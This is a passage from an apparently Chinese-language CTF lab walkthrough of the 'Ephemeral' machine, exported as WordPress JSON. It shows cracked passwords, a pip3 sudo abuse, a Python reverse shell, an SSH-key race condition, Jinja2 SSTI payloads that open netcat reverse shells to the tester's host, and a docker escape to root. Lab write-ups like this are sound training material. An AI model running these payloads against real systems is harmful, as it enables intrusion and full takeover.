|\n| randy  | d1b10494107b459a80df1e1d5b9b62bd0b24a1ce |\n+--------+------------------------------------------+\n4 rows in set (0.11 sec)<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1<\/a> \uff01<\/p>\n
\"image-20240430154854699\"<\/div><\/p>\n
kevin           jameskevingilmerjr\ndonald          24donaldson\njane            !pass_word\nrandy           !password!23<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\"image-20240430155156924\"<\/div><\/p>\n
kevin->donald<\/h3>\n
(remote) www-data@ephemeral:\/$ su -l kevin\nPassword: \nkevin@ephemeral:~$ ls -la\ntotal 76\ndrwx------ 14 kevin kevin 4096 Mar 17  2022 .\ndrwxr-xr-x  6 root  root  4096 Mar 15  2022 ..\nlrwxrwxrwx  1 root  root     9 Mar 15  2022 .bash_history -> \/dev\/null\n-rw-r--r--  1 kevin kevin  220 Mar 14  2022 .bash_logout\n-rw-r--r--  1 kevin kevin 3771 Mar 14  2022 .bashrc\ndrwxrwxr-x 12 kevin kevin 4096 Apr 30 01:51 .cache\ndrwx------ 11 kevin kevin 4096 Mar 16  2022 .config\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Desktop\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Documents\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Downloads\ndrwx------  3 kevin kevin 4096 Mar 17  2022 .gnupg\ndrwxr-xr-x  4 kevin kevin 4096 Mar 15  2022 .local\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Music\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Pictures\n-rw-r--r--  1 kevin kevin  807 Mar 14  2022 .profile\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Public\n-rw-------  1 kevin kevin  100 Mar 15  2022 .python_history\n-rw-r--r--  1 kevin kevin    0 Mar 14  2022 .sudo_as_admin_successful\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Templates\ndrwxr-xr-x  2 kevin kevin 4096 Mar 14  2022 Videos\n-rw-rw-r--  1 kevin kevin  180 Mar 16  2022 .wget-hsts\nkevin@ephemeral:~$ sudo -l\n[sudo] password for kevin: \nMatching Defaults entries for kevin on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser kevin may run the following commands on ephemeral:\n    (donald) PASSWD: \/usr\/bin\/pip3 install *<\/code><\/pre>\n
\u5c1d\u8bd5\u63d0\u6743\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/pip\/#sudo<\/a><\/p>\n
\"image-20240430155527899\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
kevin@ephemeral:~$ TF=$(mktemp -d)\nkevin@ephemeral:~$ echo "import os; os.execl('\/bin\/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF\/setup.py\nkevin@ephemeral:~$ sudo -l\nMatching Defaults entries for kevin on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser kevin may run the following commands on ephemeral:\n    (donald) PASSWD: \/usr\/bin\/pip3 install *\nkevin@ephemeral:~$ sudo -u donald \/usr\/bin\/pip3 install $TF\nERROR: Directory '\/tmp\/tmp.7PN4bblEXQ' is not installable. Neither 'setup.py' nor 'pyproject.toml' found.\nkevin@ephemeral:\/tmp\/tmp.7PN4bblEXQ$ ls -la\ntotal 12\ndrwx------ 2 kevin kevin 4096 Apr 30 01:59 .\ndrwxrwxrwt 3 root  root  4096 Apr 30 01:59 ..\n-rw-rw-r-- 1 kevin kevin   86 Apr 30 01:59 setup.py<\/code><\/pre>\n
wtf\uff1f\u5c1d\u8bd5\u4e00\u4e0b\u53cd\u5f39shell\u5427\uff1a<\/p>\n
kevin@ephemeral:\/tmp$ echo 'import os,pty,socket;s=socket.socket();s.connect(("192.168.0.143",2345));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")' > exp\/setup.py\nkevin@ephemeral:\/tmp$ chmod +x exp\/setup.py \nkevin@ephemeral:\/tmp$ sudo -u donald \/usr\/bin\/pip3 install \/tmp\/exp\/\nProcessing .\/exp<\/code><\/pre>\n
\"image-20240430161442176\"<\/div><\/p>\n
donald->jane<\/h3>\n
(remote) donald@ephemeral:\/tmp\/pip-req-build-zwnyglvc$ cd \/home\/donald\/\n(remote) donald@ephemeral:\/home\/donald$ ls -la\ntotal 216\ndrwx------ 8 donald donald   4096 Mar 17  2022 .\ndrwxr-xr-x 6 root   root     4096 Mar 15  2022 ..\n-rw------- 1 donald donald 158122 Mar 17  2022 .bash_history\n-rw-r--r-- 1 donald donald    220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 donald donald   3771 Feb 25  2020 .bashrc\ndrwx------ 4 donald donald   4096 Mar 15  2022 .cache\ndrwxr-xr-x 2 root   root     4096 Mar 15  2022 commands\ndrwx------ 4 donald donald   4096 Mar 15  2022 .config\ndrwxrwxr-x 2 donald donald   4096 Mar 16  2022 Desktop\ndrwxr-xr-x 3 donald donald   4096 Mar 15  2022 .local\n-rw-rw-r-- 1 donald donald     28 Mar 16  2022 mypass.txt\n-rw-r--r-- 1 donald donald    178 Mar 16  2022 note.txt\n-rwxr-xr-x 1 root   root      891 Mar 15  2022 .profile\n-rw------- 1 donald donald     33 Mar 15  2022 .python_history\ndrwx------ 2 donald donald   4096 Mar 16  2022 .ssh\n-rw-rw-r-- 1 donald donald    173 Mar 16  2022 .wget-hsts\n(remote) donald@ephemeral:\/home\/donald$ cat *.txt\nFjqSy9KKWgSdc65usJ7yoPNIokz\nHey Donald this is your system administrator. I left your new password in your home directory. \nJust remember to decode it.\n\nLet me know if you need your password changed again.\n(remote) donald@ephemeral:\/home\/donald$ cat .bash_history <\/code><\/pre>\n
\u5728\u5386\u53f2\u6587\u4ef6\u4e2d\u53d1\u73b0\u5f88\u591a\u4e1c\u897f\uff1a<\/p>\n
wget https:\/\/www.exploit-db.com\/raw\/41154 -O exploit.c\nls -la \ngcc exploit.c -o exploit\nls -la \nclear\nls -la \nrm -r exploit.c \nclear<\/code><\/pre>\n
sudo -u jane \/usr\/local\/bin\/addKeys.sh\ncd ..\nls -la \ncd keys\/\nls -la ~\nsudo -u jane \/usr\/local\/bin\/addKeys.sh\nls -l \/home\/jane\/\ncd<\/code><\/pre>\n
ssh jane@10.0.0.179\nexit\nssh donald@10.0.0.179 -t "bash --noprofile"\nexit \nclear<\/code><\/pre>\n
\u611f\u89c9\u50cf\u662f\u4f5c\u8005\u65e0\u5fc3\u4e4b\u5931\uff0c\u63a5\u7740\u6309\u6211\u4eec\u7684\u65b9\u6cd5\u5c1d\u8bd5\u8fdb\u884c\u89e3\u7801\uff1a<\/p>\n
\"image-20240430162116128\"<\/div><\/p>\n
nORMAniAntIcINacKLAi<\/code><\/pre>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
(remote) donald@ephemeral:\/home\/donald$ sudo -l\n[sudo] password for donald: \nMatching Defaults entries for donald on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser donald may run the following commands on ephemeral:\n    (jane) PASSWD: \/usr\/local\/bin\/addKeys.sh\n(remote) donald@ephemeral:\/home\/donald$ cat \/usr\/local\/bin\/addKeys.sh\n#!\/bin\/bash\n\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa.pub\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa\n\n\/usr\/bin\/ssh-keygen -q -t rsa -N '' -f \/dev\/shm\/id_rsa\n\n\/bin\/echo "Keys Added!"\n\n\/usr\/bin\/rm -rf \/home\/jane\/.ssh\/\n\n\/bin\/echo "Directory Deleted!"\n\n\/usr\/bin\/mkdir \/home\/jane\/.ssh\/\n\n\/bin\/echo ".ssh Directory Created!"\n\n\/usr\/bin\/cp \/dev\/shm\/id_rsa.pub \/home\/jane\/.ssh\/authorized_keys\n\n\/bin\/echo "Keys Copied."\n\n\/usr\/bin\/chmod 600 \/home\/jane\/.ssh\/authorized_keys\n\n\/bin\/echo "Permissions Changed!"\n\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa.pub \n\n\/bin\/echo "Keys Removed!"\n<\/code><\/pre>\n
\u8fd9\u4e2a\u811a\u672c\u90fd\u662f\u7edd\u5bf9\u8def\u5f84\uff0c\u5229\u7528\u4e0d\u4e86\uff0c\u89c1\u7f1d\u63d2\u9488\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
(remote) donald@ephemeral:\/dev\/shm$ ls -la\ntotal 0\ndrwxrwxrwx  2 root root   40 Apr 30  2024 .\ndrwxr-xr-x 19 root root 3980 Apr 29 23:57 ..<\/code><\/pre>\n
\u6743\u9650\u8f83\u9ad8\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ ssh donald@192.168.0.148                                      \nThe authenticity of host '192.168.0.148 (192.168.0.148)' can't be established.\nED25519 key fingerprint is SHA256:Lsf\/x4H3iybf7oKWrpIkzv3slmryI1uJdNMK6\/3BVwg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yesWarning: Permanently added '192.168.0.148' (ED25519) to the list of known hosts.\ndonald@192.168.0.148's password: \nWelcome to Ubuntu 20.04.4 LTS (GNU\/Linux 5.17.0-051700rc7-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n17 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release '22.04.3 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nYour Hardware Enablement Stack (HWE) is supported until April 2025.\nLast login: Tue Apr 30 02:40:05 2024 from 192.168.0.143\ndonald@ephemeral:~$ clear\n-rbash: \/usr\/lib\/command-not-found: restricted: cannot specify `\/' in command names\ndonald@ephemeral:~$ exit\nlogout\n-rbash: \/usr\/bin\/clear_console: restricted: cannot specify `\/' in command names\nConnection to 192.168.0.148 closed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ ssh donald@192.168.0.148 -t "bash --noprofile"\ndonald@192.168.0.148's password: \ndonald@ephemeral:~$ whoami;id\ndonald\nuid=1004(donald) gid=1004(donald) groups=1004(donald)<\/code><\/pre>\n
\n
--noprofile<\/strong>: \u8fd9\u662fbash<\/code>\u7684\u4e00\u4e2a\u9009\u9879\uff0c\u7528\u4e8e\u544a\u8bc9bash<\/code>\u4e0d\u8981\u8bfb\u53d6~\/.bash_profile<\/code>\u3001~\/.bash_login<\/code>\u3001~\/.profile<\/code>\u7b49\u521d\u59cb\u5316\u6587\u4ef6\u3002\u8fd9\u53ef\u4ee5\u52a0\u901f\u542f\u52a8\u901f\u5ea6\uff0c\u7279\u522b\u662f\u5f53\u8fd9\u4e9b\u6587\u4ef6\u4e2d\u6709\u8bb8\u591a\u590d\u6742\u7684\u547d\u4ee4\u6216\u811a\u672c\u65f6\u3002\u901a\u5e38\uff0c\u8fd9\u4e9b\u521d\u59cb\u5316\u6587\u4ef6\u7528\u4e8e\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\u3001\u522b\u540d\u3001\u51fd\u6570\u7b49\u3002<\/p>\n<\/blockquote>\n
\u5c1d\u8bd5\u8fdb\u884c\u7ade\u4e89\uff1a<\/p>\n
donald@ephemeral:\/dev\/shm$ \/usr\/bin\/ssh-keygen -q -t rsa -N '' -f \/dev\/shm\/jane\ndonald@ephemeral:\/dev\/shm$ ls -la\ntotal 8\ndrwxrwxrwx  2 root   root     80 Apr 30 03:01 .\ndrwxr-xr-x 19 root   root   3980 Apr 29 23:57 ..\n-rw-------  1 donald donald 2602 Apr 30 03:01 jane\n-rw-r--r--  1 donald donald  570 Apr 30 03:01 jane.pub\ndonald@ephemeral:\/dev\/shm$ while true; do cp \/dev\/shm\/jane \/dev\/shm\/id_rsa; chmod 777 \/dev\/shm\/id_rsa; cp \/dev\/shm\/jane.pub \/dev\/shm\/id_rsa.pub; done<\/code><\/pre>\n
donald@ephemeral:~$ sudo -u jane \/usr\/local\/bin\/addKeys.sh \n\/dev\/shm\/id_rsa already exists.\nOverwrite (y\/n)? n\nKeys Added!\nDirectory Deleted!\n.ssh Directory Created!\nKeys Copied.\nPermissions Changed!\nKeys Removed!<\/code><\/pre>\n
\"image-20240430170318058\"<\/div><\/p>\n
\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
\"image-20240430170535474\"<\/div><\/p>\n
jane->randy<\/h3>\n
\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n
jane@ephemeral:~$ ls -la\ntotal 40\ndrwx------ 7 jane jane 4096 Apr 30 03:03 .\ndrwxr-xr-x 6 root root 4096 Mar 15  2022 ..\nlrwxrwxrwx 1 root root    9 Mar 15  2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 jane jane  220 Mar 15  2022 .bash_logout\n-rw-r--r-- 1 jane jane 3771 Mar 15  2022 .bashrc\ndrwx------ 4 jane jane 4096 Mar 16  2022 .cache\ndrwx------ 4 jane jane 4096 Mar 16  2022 .config\ndrwxrwxr-x 2 jane jane 4096 Mar 17  2022 Desktop\ndrwxrwxr-x 4 jane jane 4096 Mar 17  2022 .local\n-rw-r--r-- 1 jane jane  807 Mar 15  2022 .profile\ndrwxrwxr-x 2 jane jane 4096 Apr 30 03:03 .ssh\njane@ephemeral:~$ cd Desktop\/\njane@ephemeral:~\/Desktop$ ls -la\ntotal 8\ndrwxrwxr-x 2 jane jane 4096 Mar 17  2022 .\ndrwx------ 7 jane jane 4096 Apr 30 03:03 ..\njane@ephemeral:~\/Desktop$ sudo -l\nMatching Defaults entries for jane on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser jane may run the following commands on ephemeral:\n    (randy) NOPASSWD: \/usr\/bin\/python3 \/var\/www\/html\/private_html\/app.py\njane@ephemeral:~\/Desktop$ cat \/var\/www\/html\/private_html\/app.py\nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route("\/page")\ndef page():\n\n    name = request.values.get('name')\n\n    output = Jinja2.from_string('Welcome ' + name + '!').render()\n\n    return output\n\nif __name__ == "__main__":\n    app.run(host='0.0.0.0', port=5000)<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728SSTI<\/code>\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u7a97\u53e3\u8fd0\u884c\uff0c\u4e00\u4e2a\u7a97\u53e3\u5c1d\u8bd5\u5404\u79cd\u8d1f\u8f7d\uff1a<\/p>\n
\"image-20240430171144673\"<\/div>
\n
\"image-20240430171729001\"<\/div><\/p>\n
\u9614\u4ee5\uff0c\u7ee7\u7eed\u5c1d\u8bd5\uff1a<\/p>\n
\n
https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#jinja2-python<\/a><\/p>\n
https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/Server%20Side%20Template%20Injection#jinja2---forcing-output-on-blind-rce<\/a><\/p>\n<\/blockquote>\n
{{ joiner.__init__.__globals__.os.popen('id').read() }}<\/code><\/pre>\n
\"image-20240430172119959\"<\/div><\/p>\n
\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n
http:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen('busybox nc -e \/bin\/bash 192.168.0.143 1234').read() }}\nhttp:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen('rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.0.143 1234 >\/tmp\/f').read() }}\nhttp:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen('rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>%261|nc 192.168.0.143 1234 >\/tmp\/f').read() }}<\/code><\/pre>\n
\"image-20240430173739191\"<\/div><\/p>\n
randy->root<\/h3>\n
\u7528\u6237\u5c5e\u4e8edocker<\/code>\u7ec4\uff0c\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/docker\/#shell<\/a><\/p>\n
\"image-20240430173900132\"<\/div><\/p>\n
(remote) randy@ephemeral:\/home\/jane$ docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4,6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)\n# cd \/root\n# ls -la\ntotal 40\ndrwx------  4 root root 4096 Mar 18  2022 .\ndrwxr-xr-x 21 root root 4096 Mar 17  2022 ..\nlrwxrwxrwx  1 root root    9 Mar 15  2022 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwx------  3 root root 4096 Mar 17  2022 .cache\ndrwxr-xr-x  3 root root 4096 Mar 15  2022 .local\n-rw-------  1 root root 3672 Mar 16  2022 .mysql_history\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r--r--  1 root root   66 Mar 16  2022 .selected_editor\n-rw-r--r--  1 root root  247 Mar 16  2022 .wget-hsts\n-rw-r--r--  1 root root   33 Mar 17  2022 root.txt<\/code><\/pre>\n
\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Ephemeral \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral] \u2514 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-667","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=667"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667\/revisions"}],"predecessor-version":[{"id":668,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667\/revisions\/668"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=667"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}